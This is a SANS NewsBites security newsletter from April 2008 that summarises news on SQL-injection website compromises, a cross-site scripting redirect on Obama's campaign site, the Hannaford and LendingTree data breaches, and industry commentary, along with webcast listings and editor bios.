Back to newsletter list
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
"Hundreds of thousands of Web sites - including several at the United Nations
and in the U.K. government -- have been hacked recently and seeded with code
that tries to exploit security flaws in Microsoft Windows to install
malicious software on visitors' machines," wrote the Washington Posts Brian
Krebs yesterday. His entire posting, along with a related Computerworld
article, are listed in the SQL Injection story below. If you have a job in
cyber security management, the extraordinary shift by attackers to web
application attacks forces you to re-prioritize your staff and budget. If you
cannot tell your boss exactly how well protected your web apps are, he or she
will have to find someone who can, right away. Many of the most advanced web
application pioneers are coming to Las Vegas next month to share the lessons
they learned on which web application scanners work best, whom to trust for
web app pen testing, how to get application developers to support a major
improvement in application security, and more. It's a meeting you do not want
to miss, and it has web application pen testing and secure coding courses too.
You'll find details at http://www.sans.org/info/24609
And if you have at least 300 programmers, you can invite ten to fifteen of
them take the new on-line secure coding skills assessment at no cost. It shows
them what they know and don't know about coding security (one in Java and one
in C). Email spa@sans.org to get started.
Alan
*************************************************************************
SANS NewsBites April 25, 2008 Vol. 10, Num. 33
*************************************************************************
TOP OF THE NEWS
UK Businesses Report Breaches Down, Security Spending Up
Hannaford is Beefing Up Security
The Demise of the End-User Security Industry?
THE REST OF THE WEEK'S NEWS
LEGAL MATTERS
LendingTree Files Suit Against Lenders for Unauthorized Data Access
WORMS, ACTIVE EXPLOITS, VULNERABILITIES & PATCHES
SQL Injection Attacks on the Rise Again
ATTACKS, INTRUSIONS, DATA THEFT & LOSS
Hacker Exploits Cross-Site Scripting Flaw on Obama's Website
UMass Amherst Health Services Computer System Breached
Hard Drive Sold at UConn Bookstore Contains Personal Data
MISCEL***OUS
Where Does the Responsibility for Security Lie?
Security Companies Could Block Phorm Cookies
LIST OF UPCOMING FREE SANS WEBCASTS
********************* Sponsored By Palo Alto Networks *******************
End users are circumventing IT controls and are using a new
generation of Internet applications that are creating new security
risks for the enterprise. The Application Usage & Risk Report is an
analysis of actual application traffic from over 350,000 corporate
end users. Learn more by downloading the free report now!
http://www.sans.org/info/28343
*************************************************************************
TRAINING UPDATE
Where can you find the newest Penetration Testing techniques,
Application Pen Testing, Hacker Exploits, Secure Web Application
Development, Security Essentials, Forensics, Wireless, Auditing, both
new Pen Testing courses, CISSP, and SANS' other top-rated courses
plus evening sessions with Internet Storm Center handlers.
- - SANSFire 2008 in Washington DC (7/22-7/31) SANS' biggest summer program
with many bonus sessions and a big exhibition of security products:
http://www.sans.org/info/26774
- - London (6/2-6/7) and Amsterdam (6/16-6/21)
http://www.sans.org/secureeurope08
- - San Diego (5/9-5/16) http://www.sans.org/securitywest08
- - Toronto (5/10-5/16) http://www.sans.org/toronto08
- - and in 100 other cites and on line any time: www.sans.org
*************************************************************************
TOP OF THE NEWS
--UK Businesses Report Breaches Down, Security Spending Up
(April 22 & 23, 2008)
Over the last six years, security spending at UK companies has
increased more than threefold from two percent to seven percent of
the IT budget; during that same time, the overall cost of security
breaches has dropped by one-third. The average cost of breaches
varies depending on the size of the company from GBP 15,000 (US
$29,632) to GBP 1.5 million (US $2.96 million). However, 21 percent
of the companies surveyed spend less than one percent of their IT
budget on security. Ninety four percent of wireless networks are
encrypted, compared with 47 percent six years ago, but roughly 80
percent of companies that had computers stolen had not encrypted
their hard drives. The study is conducted by a consortium managed by
PricewaterhouseCoopers on behalf of the UK Department of Business,
Enterprise and Regulatory Reform (BERR) for its 2008 Information
Security Breaches Survey (ISBS). The survey is conducted every two
years.
http://www.theregister.co.uk/2008/04/22/infosec_security_survey/print.html
http://software.silicon.com/security/0,39024655,39201844,00.htm
http://www.pwc.co.uk/eng/publications/berr_information_security_breaches_survey_2008.html
--Hannaford is Beefing Up Security
(April 22, 23 & 24, 2008)
Hannaford Bros. says it is spending millions of dollars to improve
data security after a breach that compromised as many as 4.2 million
customer credit cards. The data were stolen while in transit during
the authentication phase of the purchases; Hannaford says that now
credit card data will be encrypted the whole time they are within
the company's network. Hannaford is also now using a "24/7 managed
security monitoring and detection service."
http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1310963,00.html
http://blog.washingtonpost.com/securityfix/2008/04/hannaford.html?nav=rss_blog
http://ap.google.com/article/ALeqM5ic85268s4GzOT78ixJKz-vlSzxuwD90725C00
--The Demise of the End-User Security Industry?
(April 22 & 23, 2008)
Bruce Schneier writes in his blog that attendees at the recent RSA
Conference were not buying what the 350 exhibitors were selling because
"most ... can't understand what the products do or why they should
buy them." Schneier views this as the beginning of a sea change that
will see the demise of the end-user security industry while security is
increasingly built into the IT products themselves. Schneier likens
baked-in security in IT products to the security features of cars,
which are not sold separately yet are valuable and important.
http://www.schneier.com/blog/archives/2008/04/the_rsa_confere_1.html
[Editor's Note (Skoudis): Fascinating read. My gut tells me that
he's right, but it might take 5 or 10 years to get there.
(Schultz): End user security, a hyped up marketing term, is going to
be a short-lived approach to security, but not for the reason Schneier
mentions. Workstations, especially Windows workstations, have become
fat clients, and they will become even fatter over time. Adding end
user security functionality to them only bloats them more.
(Northcutt): I believe there is more to Bruce's insight than the
writeup implies. Here is a quote, "The booths are filled with broad
product claims, meaningless security platitudes, and unintelligible
marketing literature." He is right! The vendors are using PR firms and
marketing people who know nothing about security and everything about
differentiation. It hurts the industry. Get the engineers to describe
the products (in terms of what they actually do for the customer)
and have their writing scrubbed by a good developmental editor,
and vendors will sell more product.]
--Security Companies Could Block Phorm Cookies
(April 22, 2008)
Some security companies say they will block cookies from Phorm's
targeting advertisement service when it is launched. Although one
ISP that has agreed to use Phorm says it will be strictly an opt-in
service, other ISPs plan to make it an opt-out service, leading at
least one security company to say it does not meet the criteria for
informed consent and that its product will identify Phorm cookies
as adware. Other companies say they will keep a close eye on Phorm
when it launches and take action as they see fit.
http://news.bbc.co.uk/2/hi/technology/7359024.stm
[Editor's Note (Northcutt): This is the company formerly known as
121Media, with the proprietary "Open Internet Exchange" architecture. I
am just thankful this particular social experiment (monitoring
browsing habits and serving up targeted advertising) is in the UK,
not the US. "Honest love, I have no idea why my computer keeps serving
up ads for ______________" ]
********************** Sponsored Links: *******************************
1) Listen to the SANS Tool Talk web cast, Log Management for Security
Monitoring and IT Operations http://www.sans.org/info/28348
*************************************************************************
THE REST OF THE WEEK'S NEWS
LEGAL MATTERS
--LendingTree Files Suit Against Lenders for Unauthorized Data Access
(April 22 & 24, 2008)
LendingTree has filed a lawsuit against five lenders for accessing
customer information without authorization. The lawsuit alleges that
former LendingTree executives took passwords and allowed the lenders
to access the sensitive customer data. LendingTree believes at least
one of the lenders paid the executives for the passwords and then
turned around and sold them or the information they accessed with the
passwords. There is no evidence that the defendants used the data for
any other purpose than to offer loans. The compromised data include
names, Social Security numbers (SSNs), and income and employment
information. LendingTree has notified affected customers by mail; the
breach affects people who submitted data between October 2006 and
early 2008
http://www.latimes.com/business/la-fi-lendingtree24apr24,1,4088698.story
http://www.news.com/8301-10784_3-9926007-7.html?tag=nefd.top
WORMS, ACTIVE EXPLOITS, VULNERABILITIES & PATCHES
--SQL Injection Attacks on the Rise Again
(April 23, 2008)
The JavaScript attacks that have been plaguing websites since the
beginning of the year have begun another round. Many of the infected
websites are legitimate and well visited, including several affiliated
with the United Nations and the UK government. The attacks use SQL
injection techniques to infect the websites. Although the malicious
payload associated with the attack is now hosted at a different domain
from where it was last time the attacks spiked, it is still at a
Chinese IP address. When surfers visit infected sites, the JavaScript
loads malware onto their computers and then redirects their browsers to
a page hosted on the Chinese server. The malware attempts a variety
of exploits once it has been loaded onto the computer.
Internet Storm Center: https://isc.sans.org/diary.html?storyid=4331
http://blog.washingtonpost.com/securityfix/2008/04/hundreds_of_thousands_of_micro_1.html
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9079961&source=rss_topic17
[Editor's Note (Skoudis): These blended attack vectors are an
interesting phenomenon -- but leveraging SQL Injection to put malicious
Javascript on a website to exploit browsers that surf there is just
scratching the surface. There are a lot of these kinds of vectors
that blur the strict distinctions between web app and network attacks.
Many penetration testers have split up into "network pen testers" and
"web app pen testers", specializing in either bucket. While that's
understandable, there is incredible power in being able to work deeply
on both sides of that divide. The bad guys are seeing that now,
and really good pen testers need to leverage these blended vectors
as well.
(Honan): The Internet Storm Center has some good guidelines on how
deal with this attack including blocking access to the malware hosted
site at 2117966.net. http://isc.sans.org/diary.html?storyid=4139 ]
ATTACKS, INTRUSIONS, DATA THEFT & LOSS
--Hacker Exploits Cross-Site Scripting Flaw on Obama's Website
(April 24, 2008)
A hacker exploited a cross-site scripting vulnerability in Senator
Barack Obama's website to redirect people visiting certain sections of
the site to the website of Senator Hilary Clinton. The vulnerability
has been fixed, and while the attack does not appear to have had
a malicious intent, the incident draws attention to the fact that
political candidates need to be attentive to security issues on
their websites so as not to expose site visitors to malware that
could infect their computers and/or steal sensitive data.
http://www.cbc.ca/cp/technology/080424/z042415A.html
--UMass Amherst Health Services Computer System Breached
(April 22, 2008)
Officials at the University of Massachusetts at Amherst have uncovered
evidence of a data security breach on the University Health Services
computer system. They believe the attackers were looking for a place
to host illegal download files. University Health Services has
records on more than half of UMass Amherst students. Officials are
still assessing the incident.
http://www.cbs3springfield.com/news/local/18021744.html
--Hard Drive Sold at UConn Bookstore Contains Personal Data
(April 21 & 24, 2008)
A University of Connecticut (UConn) student who bought a 500 GB hard
drive from the UConn Co-op bookstore found it contained sensitive
personal details of 10 people who are in some way affiliated with the
University. Investigators believe the affected individuals all had
their computers serviced at the Co-op in the last several months. An
unnamed professor said when he brought his computer in for servicing,
he agreed to allow them to make a copy of his hard drive, but expected
that the data would be destroyed once the work was complete. The
compromised data include pictures, Word documents, and images of
credit cards and driver's licenses.
http://www.wfsb.com/news/15949434/detail.html
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9080162
[Editor's Note (Grefer): When you get a system serviced, especially
when this is done externally, ask first about data handling procedure,
then decide if it is worth the risk, and preferably obtain something
in writing.]
MISCEL***OUS
--Where Does the Responsibility for Security Lie?
(April 23, 2008)
A panel debate at Infosecurity Europe 2008 focused on the locus
of responsibility for security in IT products. Panel members
voiced opinions that vendors need to take responsibility for
building security into their products, but that ultimately,
IT departments are responsible for the security of the
code they use, whether it is their own or someone else's.
http://software.silicon.com/security/0,39024888,39201852,00.htm?r=1
[Editor's Note (Ranum): There is so much blame to go around, it's
hardly funny. But the bottom line is that responsibility must go to
leadership. That's the CEOs, CIOs, CTOs, and middle management. Making
sure that the designs are good and the details are covered is why
they get paid the big bucks (and sometimes the small bucks).]
UPCOMING SANS WEBCAST SCHEDULE
Tool Talk Webcast: Staying on Top of the SANS Top 20 with CORE IMPACT
WHEN: Tuesday, April 29, 2008 at 1:00 PM EDT (1700 UTC/GMT)
FEATURING: Alex Horan
http://www.sans.org/info/25539
Sponsored By: Core Security
The 2007 "SANS Top 20 Internet Security Risks" report makes it clear
that attackers can now circumvent many traditional countermeasures,
so simply implementing countermeasures is no longer enough. In fact,
short of experiencing a breach, the only way to really know your
security posture is by continually testing the defenses you've worked
so hard to put in place.
***
SANS Special Webcast: The Little Hybrid Web Worm That Could
WHEN: Wednesday, April 30, 2008 at 1:00 PM EDT (1700 UTC/GMT)
FEATURING: Billy Hoffman
http://www.sans.org/info/24614
Sponsored By: HP
This webcast examines the possibility of hybrid web worms which
use several methods to overcome the limitations of current web
worms. Specifically the authors examine how a hybrid web worm:
mutates itself to evade defenses; updates itself with new attack
vectors while in the wild; and finds and exploits targets regardless
of whether they are client web browsers or web servers.
***
WhatWorks in Intrusion Detection and Prevention: Easing the Pains of PCI
Compliance at AirTran Airways:
WHEN: Tuesday, May 06, 2008 at 1:00 PM EDT (UTC/GMT)
FEATURING: Alan Paller and Michelle Stewart
http://www.sans.org/info/27099
Sponsored By: Lancope http://www.lancope.com/
Looking for a solution to ease the pains of PCI compliance, the data
security manager for AirTran Airways needed a product that provided
increased visibility into network behavior and accountability. It
had to be behavior based and capable of collecting information from
a widely dispersed network. She found a solution that was scalable,
cost-effective and helps to quickly identify and resolve network and
security issues.
***
Internet Storm Center Webcast: Threat Update
WHEN: Wednesday, May 14, 2008 at 1:00 PM EDT (1700 UTC/GMT)
FEATURING: Johannes Ullrich
http://www.sans.org/info/27109
Sponsored By: Core Security http://www.coresecurity.com/
The SANS Internet Storm Center (ISC) uses advanced data correlation
and visualization techniques to analyze data collected from thousands
of sensors in over sixty countries. Experienced analysts constantly
monitor the Storm Center data feeds searching for trends and anomalies
in order to identify potential threats. When a threat is identified,
the team immediately begins an intensive investigation to gauge the
threat's severity and impact. This monthly webcast discusses recent
threats observed by the Internet Storm Center, and discusses new
software vulnerabilities or system exposures that were disclosed over
the past month. The general format is about 30 minutes of presentation
by senior ISC staff, followed by a question and answer period.
***
Security Inside the Perimeter: Confronting the Gap Between Talking About the
Threat and Doing Something About it
WHEN: Thursday, May 15, 2008 at 1:00 PM EDT (1700 UTC/GMT)
FEATURING: Paul Smith
http://www.sans.org/info/27114
Sponsored By: PacketMotion http://www.packetmotion.com/
Most security and IT professionals agree that the corporate network
"perimeter" is no longer viable due to laptops, tunneling applications,
VPNs and wireless, etc. But network security conventional wisdom is
still very perimeter oriented. Why the inconsistency? Perhaps people
really don't think the problem is that significant and the risk
is not that high. Or maybe they do think it's a real problem, but
hesitate to act because of cost, complexity, and risk to application
availability. This webinar will review the key aspects of this
inconsistency and offer solutions to better manage the "inside risk."
*******************************************************************
Be sure to check out the following FREE SANS archived webcasts:
Tool Talk Webcast: The ABC's of Dealing with Unique Network Security
Risks in a World of Open Campus Networks
WHEN: Wednesday, March 5, 2008 at 1:00 PM EST (1800 UTC/GMT)
FEATURING: Brian Mehlman
http://www.sans.org/info/22979
Sponsored By: Q1 Labs
SANS Special Webcast: A Response to the "Cold Boot Attack" Announcement
WHEN: Thursday, March 6, 2008 at 3:00 PM EST (1900 UTC/GMT)
FEATURING: John Strand
https://www.sans.org/webcasts/show.php?webcastid=91884
********************************************************************
The Editorial Board of SANS NewsBites
Eugene Schultz, Ph.D., CISM, CISSP is CTO of High Tower Software and
the author/co-author of books on Unix security, Internet security,
Windows NT/2000 security, incident response, and intrusion detection
and prevention. He was also the co-founder and original project manager
of the Department of Energy's Computer Incident Advisory Capability
(CIAC).
John Pescatore is Vice President at Gartner Inc.; he has worked in
computer and network security since 1978.
Stephen Northcutt founded the GIAC certification and currently serves
as President of the SANS Technology Institute, a post graduate level
IT Security College, www.sans.edu.
Johannes Ullrich is Chief Technology Officer of the Internet Storm
Center.
Howard A. Schmidt served as CSO for Microsoft and eBay and as
Vice-Chair of the President's Critical Infrastructure Protection
Board.
Ed Skoudis is co-founder of Intelguardians, a security research and
consulting firm, and author and lead instructor of the SANS Hacker
Exploits and Incident Handling course.
Tom Liston is a Senior Security Consultant and Malware Analyst for
Intelguardians, a handler for the SANS Institute's Internet Storm
Center, and co-author of the book Counter Hack Reloaded.
Dr. Eric Cole is an instructor, author and fellow with The SANS
Institute. He has written five books, including Insider Threat and
he is a senior Lockheed Martin Fellow.
Bruce Schneier has authored eight books -- including BEYOND
FEAR and SECRETS AND LIES -- and dozens of articles and academic
papers. Schneier has regularly appeared on television and radio, has
testified before Congress, and is a frequent writer and lecturer on
issues surrounding security and privacy.
Mason Brown is one of a very small number of people in the information
security field who have held a top management position in a Fortune
50 company (Alcoa). He is leading SANS' global initiative to improve
application security.
Marcus J. Ranum built the first firewall for the White House and
is widely recognized as a security products designer and industry
innovator.
Mark Weatherford, CISSP, CISM, is the Chief Information Security
Officer for the State of Colorado.
Alan Paller is director of research at the SANS Institute
Clint Kreitner is the founding President and CEO of The Center for
Internet Security.
Rohit Dhamankar is the Lead Security Architect at TippingPoint, a
division of 3Com, and authors the critical vulnerabilities section
of the weekly SANS Institute's @RISK newsletter and is the project
manager for the SANS Top20 2005 and the Top 20 Quarterly updates.
Koon Yaw Tan is Assistant Director at Monetary Authority of Singapore
(MAS) and a handler for the SANS Institute's Internet Storm Center.
Gal Shpantzer is a trusted advisor to several successful IT outsourcing
companies and was involved in multiple SANS projects, such as the
E-Warfare course and the Business Continuity Step-by-Step Guide.
Brian Honan is an independent security consultant based in Dublin,
Ireland.
Roland Grefer is an independent consultant based in Clearwater,
Florida.
Please feel free to share this with interested parties via email,
but no posting is allowed on web sites. For a free subscription,
(and for free posters) or to update a current subscription, visit
http://portal.sans.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)
iD8DBQFIEkTm+LUG5KFpTkYRAqScAJ9jefR9QDoCAdZIM8cLFHsqyOZurwCfVvfi
zNm7SkQZdf2rHRTj4LgyL+U=
=QAOU
-----END PGP SIGNATURE-----
